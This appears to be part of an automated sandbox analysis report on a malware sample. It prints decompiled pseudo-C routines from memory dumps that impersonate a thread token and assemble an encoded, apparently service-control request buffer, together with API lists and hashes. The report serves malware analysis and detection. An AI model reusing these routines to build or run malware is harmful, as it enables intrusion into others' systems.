                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 2435877492-0
                                                                                                          • Opcode ID: 55d24400eda0c2541fb93f10314289dbfbf31dd1515e187b6b04daf42c3a5896
                                                                                                          • Instruction ID: a3aee2f54907bd3c5c46eb4a680fafdb545738e6a14b08d0864a74a615232067
                                                                                                          • Opcode Fuzzy Hash: 55d24400eda0c2541fb93f10314289dbfbf31dd1515e187b6b04daf42c3a5896
                                                                                                          • Instruction Fuzzy Hash: 55016D79A41128FBEB209F65ED0CD9E7E78EFC5764B100061F905E2180D775AE42EAA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4796E(void* __ecx, void* _a4) {
                                                                                                          				void* _v8;
                                                                                                          				void _v12;
                                                                                                          				void* _t12;
                                                                                                          
                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                          				_t12 = CreateThread(0, 0, E04A47957,  &_v12, 4, 0);
                                                                                                          				_v8 = _t12;
                                                                                                          				if(_t12 != 0) {
                                                                                                          					if(SetThreadToken( &_v8, _a4) != 0) {
                                                                                                          						if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                          							GetLastError();
                                                                                                          						} else {
                                                                                                          							WaitForSingleObject(_v8, 0xffffffff);
                                                                                                          						}
                                                                                                          					}
                                                                                                          					CloseHandle(_v8);
                                                                                                          				}
                                                                                                          				return _v12;
                                                                                                          			}






                                                                                                          0x04a47973
                                                                                                          0x04a47988
                                                                                                          0x04a4798e
                                                                                                          0x04a47993
                                                                                                          0x04a479a4
                                                                                                          0x04a479b2
                                                                                                          0x04a479c1
                                                                                                          0x04a479b4
                                                                                                          0x04a479b9
                                                                                                          0x04a479b9
                                                                                                          0x04a479b2
                                                                                                          0x04a479ca
                                                                                                          0x04a479ca
                                                                                                          0x04a479d4

                                                                                                          APIs
                                                                                                          • CreateThread.KERNEL32 ref: 04A47988
                                                                                                          • SetThreadToken.ADVAPI32(?,00000000,?,?,?,04A47B4A,?,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A4799C
                                                                                                          • ResumeThread.KERNEL32(?,?,?,?,04A47B4A,?,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A479A9
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,04A47B4A,?,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A479B9
                                                                                                          • GetLastError.KERNEL32(?,?,?,04A47B4A,?,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A479C1
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,04A47B4A,?,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A479CA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 1168161173-0
                                                                                                          • Opcode ID: 2c5d27caa534589635bf51e125fdfb9bdebce188ea78d1a782a0d5c03ff393c7
                                                                                                          • Instruction ID: 7e73f5d9bac6874cf539c3e399f5bd2b276b78f5810bd8f3c6bee73b15c5a0da
                                                                                                          • Opcode Fuzzy Hash: 2c5d27caa534589635bf51e125fdfb9bdebce188ea78d1a782a0d5c03ff393c7
                                                                                                          • Instruction Fuzzy Hash: C1F0EC78640209FBEF509BE4ED0AF9D7B78EBD4715F200250F611E50E0D775EA469B14
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A44B5D(intOrPtr* __eax, void* _a4, signed char _a7, intOrPtr* _a8, signed int* _a12, signed short* _a16) {
                                                                                                          				char _v5;
                                                                                                          				signed int _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				intOrPtr _v20;
                                                                                                          				intOrPtr* _t120;
                                                                                                          				intOrPtr* _t122;
                                                                                                          				intOrPtr* _t124;
                                                                                                          				intOrPtr* _t126;
                                                                                                          				intOrPtr* _t128;
                                                                                                          				intOrPtr* _t130;
                                                                                                          				signed short _t136;
                                                                                                          				void* _t139;
                                                                                                          				void* _t141;
                                                                                                          				signed char _t143;
                                                                                                          				signed short _t145;
                                                                                                          				intOrPtr* _t147;
                                                                                                          				intOrPtr* _t150;
                                                                                                          				intOrPtr* _t153;
                                                                                                          				signed char _t156;
                                                                                                          				intOrPtr* _t160;
                                                                                                          				intOrPtr* _t163;
                                                                                                          				intOrPtr* _t166;
                                                                                                          				signed char _t169;
                                                                                                          				signed short _t171;
                                                                                                          				intOrPtr* _t176;
                                                                                                          				intOrPtr* _t182;
                                                                                                          				intOrPtr* _t187;
                                                                                                          				signed char _t188;
                                                                                                          				intOrPtr _t189;
                                                                                                          				intOrPtr _t190;
                                                                                                          				intOrPtr _t191;
                                                                                                          				intOrPtr _t192;
                                                                                                          				intOrPtr _t193;
                                                                                                          				intOrPtr _t194;
                                                                                                          				short _t202;
                                                                                                          				signed int _t203;
                                                                                                          				intOrPtr* _t205;
                                                                                                          				intOrPtr* _t208;
                                                                                                          				intOrPtr* _t211;
                                                                                                          				intOrPtr _t214;
                                                                                                          				intOrPtr _t216;
                                                                                                          				intOrPtr _t218;
                                                                                                          				intOrPtr _t219;
                                                                                                          				intOrPtr _t221;
                                                                                                          				intOrPtr _t223;
                                                                                                          				signed int _t225;
                                                                                                          				intOrPtr _t227;
                                                                                                          				signed int _t228;
                                                                                                          				intOrPtr _t230;
                                                                                                          				intOrPtr* _t232;
                                                                                                          				void* _t234;
                                                                                                          				intOrPtr _t236;
                                                                                                          				signed char _t237;
                                                                                                          				intOrPtr _t238;
                                                                                                          				signed char _t239;
                                                                                                          				intOrPtr* _t240;
                                                                                                          				signed int _t241;
                                                                                                          				intOrPtr _t243;
                                                                                                          				void* _t245;
                                                                                                          				void* _t252;
                                                                                                          				void* _t256;
                                                                                                          				void* _t257;
                                                                                                          				void* _t258;
                                                                                                          				void* _t259;
                                                                                                          				void* _t260;
                                                                                                          				void* _t261;
                                                                                                          				void* _t262;
                                                                                                          				void* _t263;
                                                                                                          				void* _t265;
                                                                                                          				void* _t266;
                                                                                                          				void* _t267;
                                                                                                          				void* _t268;
                                                                                                          				void* _t269;
                                                                                                          				void* _t270;
                                                                                                          				signed int _t276;
                                                                                                          				void* _t278;
                                                                                                          				void* _t279;
                                                                                                          				void* _t280;
                                                                                                          				signed int _t281;
                                                                                                          				void* _t282;
                                                                                                          
                                                                                                          				_t187 = __eax;
                                                                                                          				 *_a12 =  *_a12 & 0x00000000;
                                                                                                          				_t120 = __eax;
                                                                                                          				_v5 = 0;
                                                                                                          				_t3 = _t120 + 1; // 0x1
                                                                                                          				_t265 = _t3;
                                                                                                          				do {
                                                                                                          					_t189 =  *_t120;
                                                                                                          					_t120 = _t120 + 1;
                                                                                                          				} while (_t189 != 0);
                                                                                                          				_v12 = _t120 - _t265;
                                                                                                          				_t122 = __eax;
                                                                                                          				_t5 = _t122 + 1; // 0x1
                                                                                                          				_t266 = _t5;
                                                                                                          				do {
                                                                                                          					_t190 =  *_t122;
                                                                                                          					_t122 = _t122 + 1;
                                                                                                          				} while (_t190 != 0);
                                                                                                          				_t245 = _t122 - _t266;
                                                                                                          				_t124 = __eax;
                                                                                                          				_t6 = _t124 + 1; // 0x1
                                                                                                          				_t267 = _t6;
                                                                                                          				do {
                                                                                                          					_t191 =  *_t124;
                                                                                                          					_t124 = _t124 + 1;
                                                                                                          				} while (_t191 != 0);
                                                                                                          				_v16 = _t124 - _t267;
                                                                                                          				_t126 = __eax;
                                                                                                          				_t8 = _t126 + 1; // 0x1
                                                                                                          				_t268 = _t8;
                                                                                                          				do {
                                                                                                          					_t192 =  *_t126;
                                                                                                          					_t126 = _t126 + 1;
                                                                                                          				} while (_t192 != 0);
                                                                                                          				_t234 = _t126 - _t268;
                                                                                                          				_t128 = _a8;
                                                                                                          				_t10 = _t128 + 1; // 0x1
                                                                                                          				_t269 = _t10;
                                                                                                          				do {
                                                                                                          					_t193 =  *_t128;
                                                                                                          					_t128 = _t128 + 1;
                                                                                                          				} while (_t193 != 0);
                                                                                                          				_v20 = _t128 - _t269;
                                                                                                          				_t130 = _a8;
                                                                                                          				_t13 = _t130 + 1; // 0x1
                                                                                                          				_t270 = _t13;
                                                                                                          				do {
                                                                                                          					_t194 =  *_t130;
                                                                                                          					_t130 = _t130 + 1;
                                                                                                          				} while (_t194 != 0);
                                                                                                          				_t20 = (_v12 + _v16 + _v20) * 2; // 0x10088
                                                                                                          				_t136 = (0x0000fffe - _t245 + _t245 & 0x00000003) + (0x0000fffe - _t234 + _t234 & 0x00000003) + (0x0000fffe - _t130 - _t270 + _t130 - _t270 & 0x00000003) + _t20 + 0x8a;
                                                                                                          				 *_a16 = _t136;
                                                                                                          				_t139 = HeapAlloc(GetProcessHeap(), 8, _t136 & 0x0000ffff);
                                                                                                          				 *_a12 = _t139;
                                                                                                          				if(_t139 != 0) {
                                                                                                          					_t276 = 0;
                                                                                                          					_t252 = 0x18;
                                                                                                          					do {
                                                                                                          						_t23 = _t276 + 0x4a53730; // 0xfcfffffa
                                                                                                          						 *(_t276 + _t139) =  !( *_t23);
                                                                                                          						_t276 = _t276 + 1;
                                                                                                          						_t252 = _t252 - 1;
                                                                                                          					} while (_t252 != 0);
                                                                                                          					_t202 = 0xc;
                                                                                                          					 *(_t139 + 0xc) = 2;
                                                                                                          					 *((short*)(_t139 + 0x16)) = _t202;
                                                                                                          					_t28 = _t139 + 0x18; // 0x18
                                                                                                          					_t203 = 5;
                                                                                                          					_t141 = memcpy(_t28, _a4, _t203 << 2);
                                                                                                          					_t205 = _t187;
                                                                                                          					_t30 = _t205 + 1; // 0x1
                                                                                                          					_t278 = _t30;
                                                                                                          					do {
                                                                                                          						_t236 =  *_t205;
                                                                                                          						_t205 = _t205 + 1;
                                                                                                          					} while (_t236 != 0);
                                                                                                          					 *((intOrPtr*)(_t141 + 0x2c)) = _t205 - _t278 + 1;
                                                                                                          					_t208 = _t187;
                                                                                                          					_t32 = _t208 + 1; // 0x1
                                                                                                          					_t279 = _t32;
                                                                                                          					do {
                                                                                                          						_t237 =  *_t208;
                                                                                                          						_t208 = _t208 + 1;
                                                                                                          					} while (_t237 != 0);
                                                                                                          					 *((intOrPtr*)(_t141 + 0x34)) = _t208 - _t279 + 1;
                                                                                                          					_t211 = _t187;
                                                                                                          					_v12 = 0x38;
                                                                                                          					_a7 = _t237;
                                                                                                          					_t36 = _t211 + 1; // 0x1
                                                                                                          					_t280 = _t36;
                                                                                                          					do {
                                                                                                          						_t238 =  *_t211;
                                                                                                          						_t211 = _t211 + 1;
                                                                                                          					} while (_t238 != 0);
                                                                                                          					if(_t211 != _t280) {
                                                                                                          						_t241 = 0;
                                                                                                          						do {
                                                                                                          							_v12 = _v12 + 2;
                                                                                                          							_a7 = _a7 + 1;
                                                                                                          							 *((char*)(_t141 + (_v12 & 0x0000ffff))) =  *((intOrPtr*)(_t241 + _t187));
                                                                                                          							_t232 = _t187;
                                                                                                          							_t44 = _t232 + 1; // 0x1
                                                                                                          							_t282 = _t44;
                                                                                                          							do {
                                                                                                          								_t243 =  *_t232;
                                                                                                          								_t232 = _t232 + 1;
                                                                                                          							} while (_t243 != 0);
                                                                                                          							_t241 = _a7 & 0x000000ff;
                                                                                                          						} while (_t241 < _t232 - _t282);
                                                                                                          					}
                                                                                                          					_v12 = _v12 + 2;
                                                                                                          					_t143 = _v12 & 3;
                                                                                                          					if(_t143 < 0) {
                                                                                                          						_t143 = (_t143 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                          					}
                                                                                                          					if(_t143 != 0) {
                                                                                                          						_v12 = _v12 + (_t143 & 0x000000ff);
                                                                                                          					}
                                                                                                          					_t281 =  *_a12;
                                                                                                          					_t145 = rand();
                                                                                                          					_v12 = _v12 + 4;
                                                                                                          					 *((_v12 & 0x0000ffff) + _t281) = _t145 & 0x0000ffff;
                                                                                                          					_t147 = _t187;
                                                                                                          					_t56 = _t147 + 1; // 0x1
                                                                                                          					_t256 = _t56;
                                                                                                          					do {
                                                                                                          						_t214 =  *_t147;
                                                                                                          						_t147 = _t147 + 1;
                                                                                                          					} while (_t214 != 0);
                                                                                                          					_v12 = _v12 + 8;
                                                                                                          					 *((_v12 & 0x0000ffff) + _t281) = _t147 - _t256 + 1;
                                                                                                          					_t150 = _t187;
                                                                                                          					_t61 = _t150 + 1; // 0x1
                                                                                                          					_t257 = _t61;
                                                                                                          					do {
                                                                                                          						_t216 =  *_t150;
                                                                                                          						_t150 = _t150 + 1;
                                                                                                          					} while (_t216 != 0);
                                                                                                          					_v12 = _v12 + 4;
                                                                                                          					 *((_v12 & 0x0000ffff) + _t281) = _t150 - _t257 + 1;
                                                                                                          					_t153 = _t187;
                                                                                                          					_t239 = 0;
                                                                                                          					_t66 = _t153 + 1; // 0x1
                                                                                                          					_t258 = _t66;
                                                                                                          					do {
                                                                                                          						_t218 =  *_t153;
                                                                                                          						_t153 = _t153 + 1;
                                                                                                          					} while (_t218 != 0);
                                                                                                          					if(_t153 != _t258) {
                                                                                                          						_t228 = 0;
                                                                                                          						do {
                                                                                                          							_v12 = _v12 + 2;
                                                                                                          							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t228 + _t187));
                                                                                                          							_t182 = _t187;
                                                                                                          							_t239 = _t239 + 1;
                                                                                                          							_t72 = _t182 + 1; // 0x1
                                                                                                          							_t263 = _t72;
                                                                                                          							do {
                                                                                                          								_t230 =  *_t182;
                                                                                                          								_t182 = _t182 + 1;
                                                                                                          							} while (_t230 != 0);
                                                                                                          							_t228 = _t239 & 0x000000ff;
                                                                                                          						} while (_t228 < _t182 - _t263);
                                                                                                          					}
                                                                                                          					_v12 = _v12 + 2;
                                                                                                          					_t156 = _v12 & 3;
                                                                                                          					if(_t156 < 0) {
                                                                                                          						_t156 = (_t156 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                          					}
                                                                                                          					if(_t156 != 0) {
                                                                                                          						_v12 = _v12 + (_t156 & 0x000000ff);
                                                                                                          					}
                                                                                                          					_v12 = _v12 + 4;
                                                                                                          					_t240 = _a8;
                                                                                                          					 *((_v12 & 0x0000ffff) + _t281) = 0xf01ff;
                                                                                                          					_v12 = _v12 + 4;
                                                                                                          					 *((_v12 & 0x0000ffff) + _t281) = 0x10;
                                                                                                          					_v12 = _v12 + 8;
                                                                                                          					 *((_v12 & 0x0000ffff) + _t281) = 2;
                                                                                                          					_t160 = _t240;
                                                                                                          					_t259 = _t160 + 1;
                                                                                                          					do {
                                                                                                          						_t219 =  *_t160;
                                                                                                          						_t160 = _t160 + 1;
                                                                                                          					} while (_t219 != 0);
                                                                                                          					_v12 = _v12 + 8;
                                                                                                          					 *((_v12 & 0x0000ffff) + _t281) = _t160 - _t259 + 1;
                                                                                                          					_t163 = _t240;
                                                                                                          					_t260 = _t163 + 1;
                                                                                                          					do {
                                                                                                          						_t221 =  *_t163;
                                                                                                          						_t163 = _t163 + 1;
                                                                                                          					} while (_t221 != 0);
                                                                                                          					_v12 = _v12 + 4;
                                                                                                          					 *((_v12 & 0x0000ffff) + _t281) = _t163 - _t260 + 1;
                                                                                                          					_t166 = _t240;
                                                                                                          					_t188 = 0;
                                                                                                          					_t261 = _t166 + 1;
                                                                                                          					do {
                                                                                                          						_t223 =  *_t166;
                                                                                                          						_t166 = _t166 + 1;
                                                                                                          					} while (_t223 != 0);
                                                                                                          					if(_t166 != _t261) {
                                                                                                          						_t225 = 0;
                                                                                                          						do {
                                                                                                          							_v12 = _v12 + 2;
                                                                                                          							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t225 + _t240));
                                                                                                          							_t176 = _t240;
                                                                                                          							_t188 = _t188 + 1;
                                                                                                          							_t262 = _t176 + 1;
                                                                                                          							do {
                                                                                                          								_t227 =  *_t176;
                                                                                                          								_t176 = _t176 + 1;
                                                                                                          							} while (_t227 != 0);
                                                                                                          							_t225 = _t188 & 0x000000ff;
                                                                                                          						} while (_t225 < _t176 - _t262);
                                                                                                          					}
                                                                                                          					_v12 = _v12 + 2;
                                                                                                          					_t169 = _v12 & 3;
                                                                                                          					if(_t169 < 0) {
                                                                                                          						_t169 = (_t169 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                          					}
                                                                                                          					if(_t169 != 0) {
                                                                                                          						_v12 = _v12 + (_t169 & 0x000000ff);
                                                                                                          					}
                                                                                                          					_t171 = _v12 + 0x1c;
                                                                                                          					 *_a16 = _t171;
                                                                                                          					 *(_t281 + 8) = _t171;
                                                                                                          					_v5 = 1;
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}



















































































                                                                                                          0x04a44b64
                                                                                                          0x04a44b69
                                                                                                          0x04a44b6d
                                                                                                          0x04a44b70
                                                                                                          0x04a44b74
                                                                                                          0x04a44b74
                                                                                                          0x04a44b77
                                                                                                          0x04a44b77
                                                                                                          0x04a44b79
                                                                                                          0x04a44b7a
                                                                                                          0x04a44b80
                                                                                                          0x04a44b83
                                                                                                          0x04a44b85
                                                                                                          0x04a44b85
                                                                                                          0x04a44b88
                                                                                                          0x04a44b88
                                                                                                          0x04a44b8a
                                                                                                          0x04a44b8b
                                                                                                          0x04a44b91
                                                                                                          0x04a44b93
                                                                                                          0x04a44b95
                                                                                                          0x04a44b95
                                                                                                          0x04a44b98
                                                                                                          0x04a44b98
                                                                                                          0x04a44b9a
                                                                                                          0x04a44b9b
                                                                                                          0x04a44ba1
                                                                                                          0x04a44ba4
                                                                                                          0x04a44ba6
                                                                                                          0x04a44ba6
                                                                                                          0x04a44ba9
                                                                                                          0x04a44ba9
                                                                                                          0x04a44bab
                                                                                                          0x04a44bac
                                                                                                          0x04a44bb2
                                                                                                          0x04a44bb4
                                                                                                          0x04a44bb7
                                                                                                          0x04a44bb7
                                                                                                          0x04a44bba
                                                                                                          0x04a44bba
                                                                                                          0x04a44bbc
                                                                                                          0x04a44bbd
                                                                                                          0x04a44bc3
                                                                                                          0x04a44bc6
                                                                                                          0x04a44bc9
                                                                                                          0x04a44bc9
                                                                                                          0x04a44bcc
                                                                                                          0x04a44bcc
                                                                                                          0x04a44bce
                                                                                                          0x04a44bcf
                                                                                                          0x04a44c04
                                                                                                          0x04a44c04
                                                                                                          0x04a44c0b
                                                                                                          0x04a44c1b
                                                                                                          0x04a44c24
                                                                                                          0x04a44c28
                                                                                                          0x04a44c30
                                                                                                          0x04a44c32
                                                                                                          0x04a44c33
                                                                                                          0x04a44c33
                                                                                                          0x04a44c3b
                                                                                                          0x04a44c3e
                                                                                                          0x04a44c3f
                                                                                                          0x04a44c3f
                                                                                                          0x04a44c47
                                                                                                          0x04a44c48
                                                                                                          0x04a44c4f
                                                                                                          0x04a44c55
                                                                                                          0x04a44c58
                                                                                                          0x04a44c59
                                                                                                          0x04a44c5b
                                                                                                          0x04a44c5d
                                                                                                          0x04a44c5d
                                                                                                          0x04a44c60
                                                                                                          0x04a44c60
                                                                                                          0x04a44c62
                                                                                                          0x04a44c63
                                                                                                          0x04a44c6a
                                                                                                          0x04a44c6d
                                                                                                          0x04a44c6f
                                                                                                          0x04a44c6f
                                                                                                          0x04a44c72
                                                                                                          0x04a44c72
                                                                                                          0x04a44c74
                                                                                                          0x04a44c75
                                                                                                          0x04a44c7c
                                                                                                          0x04a44c7f
                                                                                                          0x04a44c81
                                                                                                          0x04a44c88
                                                                                                          0x04a44c8b
                                                                                                          0x04a44c8b
                                                                                                          0x04a44c8e
                                                                                                          0x04a44c8e
                                                                                                          0x04a44c90
                                                                                                          0x04a44c91
                                                                                                          0x04a44c97
                                                                                                          0x04a44c99
                                                                                                          0x04a44c9b
                                                                                                          0x04a44ca2
                                                                                                          0x04a44ca6
                                                                                                          0x04a44ca9
                                                                                                          0x04a44cac
                                                                                                          0x04a44cae
                                                                                                          0x04a44cae
                                                                                                          0x04a44cb1
                                                                                                          0x04a44cb1
                                                                                                          0x04a44cb3
                                                                                                          0x04a44cb4
                                                                                                          0x04a44cb8
                                                                                                          0x04a44cbe
                                                                                                          0x04a44c9b
                                                                                                          0x04a44cc2
                                                                                                          0x04a44cca
                                                                                                          0x04a44ccf
                                                                                                          0x04a44cd5
                                                                                                          0x04a44cd5
                                                                                                          0x04a44cd8
                                                                                                          0x04a44cdd
                                                                                                          0x04a44cdd
                                                                                                          0x04a44ce4
                                                                                                          0x04a44ce6
                                                                                                          0x04a44cf0
                                                                                                          0x04a44cf7
                                                                                                          0x04a44cfa
                                                                                                          0x04a44cfc
                                                                                                          0x04a44cfc
                                                                                                          0x04a44cff
                                                                                                          0x04a44cff
                                                                                                          0x04a44d01
                                                                                                          0x04a44d02
                                                                                                          0x04a44d0d
                                                                                                          0x04a44d11
                                                                                                          0x04a44d14
                                                                                                          0x04a44d16
                                                                                                          0x04a44d16
                                                                                                          0x04a44d19
                                                                                                          0x04a44d19
                                                                                                          0x04a44d1b
                                                                                                          0x04a44d1c
                                                                                                          0x04a44d24
                                                                                                          0x04a44d2b
                                                                                                          0x04a44d2e
                                                                                                          0x04a44d30
                                                                                                          0x04a44d32
                                                                                                          0x04a44d32
                                                                                                          0x04a44d35
                                                                                                          0x04a44d35
                                                                                                          0x04a44d37
                                                                                                          0x04a44d38
                                                                                                          0x04a44d3e
                                                                                                          0x04a44d40
                                                                                                          0x04a44d42
                                                                                                          0x04a44d49
                                                                                                          0x04a44d4d
                                                                                                          0x04a44d50
                                                                                                          0x04a44d52
                                                                                                          0x04a44d54
                                                                                                          0x04a44d54
                                                                                                          0x04a44d57
                                                                                                          0x04a44d57
                                                                                                          0x04a44d59
                                                                                                          0x04a44d5a
                                                                                                          0x04a44d5e
                                                                                                          0x04a44d63
                                                                                                          0x04a44d42
                                                                                                          0x04a44d67
                                                                                                          0x04a44d6f
                                                                                                          0x04a44d74
                                                                                                          0x04a44d7a
                                                                                                          0x04a44d7a
                                                                                                          0x04a44d7d
                                                                                                          0x04a44d82
                                                                                                          0x04a44d82
                                                                                                          0x04a44d8a
                                                                                                          0x04a44d8e
                                                                                                          0x04a44d91
                                                                                                          0x04a44d9c
                                                                                                          0x04a44da0
                                                                                                          0x04a44dab
                                                                                                          0x04a44daf
                                                                                                          0x04a44db6
                                                                                                          0x04a44db8
                                                                                                          0x04a44dbb
                                                                                                          0x04a44dbb
                                                                                                          0x04a44dbd
                                                                                                          0x04a44dbe
                                                                                                          0x04a44dc9
                                                                                                          0x04a44dcd
                                                                                                          0x04a44dd0
                                                                                                          0x04a44dd2
                                                                                                          0x04a44dd5
                                                                                                          0x04a44dd5
                                                                                                          0x04a44dd7
                                                                                                          0x04a44dd8
                                                                                                          0x04a44de0
                                                                                                          0x04a44de7
                                                                                                          0x04a44dea
                                                                                                          0x04a44dec
                                                                                                          0x04a44dee
                                                                                                          0x04a44df1
                                                                                                          0x04a44df1
                                                                                                          0x04a44df3
                                                                                                          0x04a44df4
                                                                                                          0x04a44dfa
                                                                                                          0x04a44dfc
                                                                                                          0x04a44dfe
                                                                                                          0x04a44e05
                                                                                                          0x04a44e09
                                                                                                          0x04a44e0c
                                                                                                          0x04a44e0e
                                                                                                          0x04a44e10
                                                                                                          0x04a44e13
                                                                                                          0x04a44e13
                                                                                                          0x04a44e15
                                                                                                          0x04a44e16
                                                                                                          0x04a44e1a
                                                                                                          0x04a44e1f
                                                                                                          0x04a44dfe
                                                                                                          0x04a44e23
                                                                                                          0x04a44e2b
                                                                                                          0x04a44e30
                                                                                                          0x04a44e36
                                                                                                          0x04a44e36
                                                                                                          0x04a44e39
                                                                                                          0x04a44e3e
                                                                                                          0x04a44e3e
                                                                                                          0x04a44e48
                                                                                                          0x04a44e4b
                                                                                                          0x04a44e4e
                                                                                                          0x04a44e52
                                                                                                          0x04a44e52
                                                                                                          0x04a44e5d

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,74714F20,761F4DB0,00000000,?,00000000,00000000,00000000), ref: 04A44C14
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A44C1B
                                                                                                          • rand.MSVCRT ref: 04A44CE6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessrand
                                                                                                          • String ID: Oqt Uqt0Xqt$8
                                                                                                          • API String ID: 1878709018-771429982
                                                                                                          • Opcode ID: 22581932c3549ba65f07985705ffcd4a0b662ffd58f2036642395b40cf5aec76
                                                                                                          • Instruction ID: 100e5d0b363ef1c17e1abf6b589bb8bcd30df283925d6bda844d6f6f2c3da895
                                                                                                          • Opcode Fuzzy Hash: 22581932c3549ba65f07985705ffcd4a0b662ffd58f2036642395b40cf5aec76
                                                                                                          • Instruction Fuzzy Hash: 46B1F335A042569FCB168F6C84643FD7FF1AF8A318F2881D9D8C1EB241DA35E64AC740
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A44E60(intOrPtr _a4, void* _a8, short _a12) {
                                                                                                          				char _v5;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				void* _t27;
                                                                                                          				short _t29;
                                                                                                          				signed char* _t31;
                                                                                                          				void* _t38;
                                                                                                          				signed char _t45;
                                                                                                          				signed int* _t51;
                                                                                                          				void* _t53;
                                                                                                          				intOrPtr _t54;
                                                                                                          				void* _t57;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t27 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                          				_t57 = _t27;
                                                                                                          				if(_t57 == 0) {
                                                                                                          					L11:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t53 = 0x10;
                                                                                                          				do {
                                                                                                          					 *_t27 =  !( *(0x4a53730 + _t27));
                                                                                                          					_t27 = _t27 + 1;
                                                                                                          					_t53 = _t53 - 1;
                                                                                                          				} while (_t53 != 0);
                                                                                                          				_t29 = 0x48;
                                                                                                          				 *((short*)(_t57 + 8)) = _t29;
                                                                                                          				 *((short*)(_t57 + 0x10)) = 0x10b8;
                                                                                                          				 *((short*)(_t57 + 0x12)) = 0x10b8;
                                                                                                          				 *((char*)(_t57 + 2)) = 0xb;
                                                                                                          				_t51 = 0x4a53700;
                                                                                                          				_t7 = _t57 + 0x18; // 0x18
                                                                                                          				_t31 = _t7;
                                                                                                          				_t54 = 0x30;
                                                                                                          				do {
                                                                                                          					_t45 =  !( *_t51);
                                                                                                          					_t51 =  &(_t51[0]);
                                                                                                          					 *_t31 = _t45;
                                                                                                          					_t31 =  &(_t31[1]);
                                                                                                          					_t54 = _t54 - 1;
                                                                                                          				} while (_t54 != 0);
                                                                                                          				if(E04A42F5A(_a4, _a8, _a12, _t54, 0xff, 8, _t57, 0x48) != 0) {
                                                                                                          					_v16 = _v16 & 0x00000000;
                                                                                                          					_v12 = _v12 & 0x00000000;
                                                                                                          					if(E04A43071(_t51, _a4, _a8, _a12,  &_v12,  &_v16) != 0) {
                                                                                                          						_t38 = _v12;
                                                                                                          						if(0 ==  *((intOrPtr*)(_t38 + _v16 - 0x18))) {
                                                                                                          							_v5 = 1;
                                                                                                          						}
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t38);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t57);
                                                                                                          				goto L11;
                                                                                                          			}















                                                                                                          0x04a44e72
                                                                                                          0x04a44e79
                                                                                                          0x04a44e7f
                                                                                                          0x04a44e83
                                                                                                          0x04a44f38
                                                                                                          0x04a44f3e
                                                                                                          0x04a44f3e
                                                                                                          0x04a44e90
                                                                                                          0x04a44e94
                                                                                                          0x04a44e99
                                                                                                          0x04a44e9b
                                                                                                          0x04a44e9c
                                                                                                          0x04a44e9c
                                                                                                          0x04a44ea1
                                                                                                          0x04a44ea2
                                                                                                          0x04a44eaf
                                                                                                          0x04a44eb3
                                                                                                          0x04a44eb7
                                                                                                          0x04a44ebb
